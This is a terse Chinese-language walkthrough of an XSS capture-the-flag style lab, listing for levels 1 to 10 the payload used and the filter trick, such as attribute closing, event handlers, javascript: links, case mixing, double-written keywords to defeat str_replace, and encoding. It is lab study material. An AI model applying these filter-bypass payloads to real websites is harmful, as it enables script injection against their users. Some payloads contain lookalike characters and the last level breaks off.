XSS闯关
思路:闭合事件闭合标签
xss语句
οnclick=alert(1)
<a href=javascript:alert(‘xss’)>
level 1
直接输入
level 2
输入
查看源码发现被转义 无法注入<>
在源码这边搞事情,前后闭合
"><script>alert('xss')</script>
level 3
'οnclick='alert(“xss”)
'()未转义
转义”<>
level 4
"οnclick="alert(‘xss’)
闭合事件
level 5
"><a href=javascript:alert(‘xss’)>
onclick,script被破坏
超链接
level 6
"><a hRef=javasCript:alert(‘xss’)>
猜测str_replace
用大写绕过
level 7
"><a hrhRefef=javasscripTCript:alert(‘xss’)>
猜测替换为空
level 8
伪协议???
unicode编码????
javasCript:alert(‘xss’)编码
贴个网站:http://tool.chinaz.com/tools/unicode.aspx?qq-pf-to=pcqq.group
level 9
要http
一样会被转义编码一个
javasCript:alert(‘xss’)//http://127.0.0.1//
level 10
onmouseover鼠标指针移动到图片后执行Javascript代码: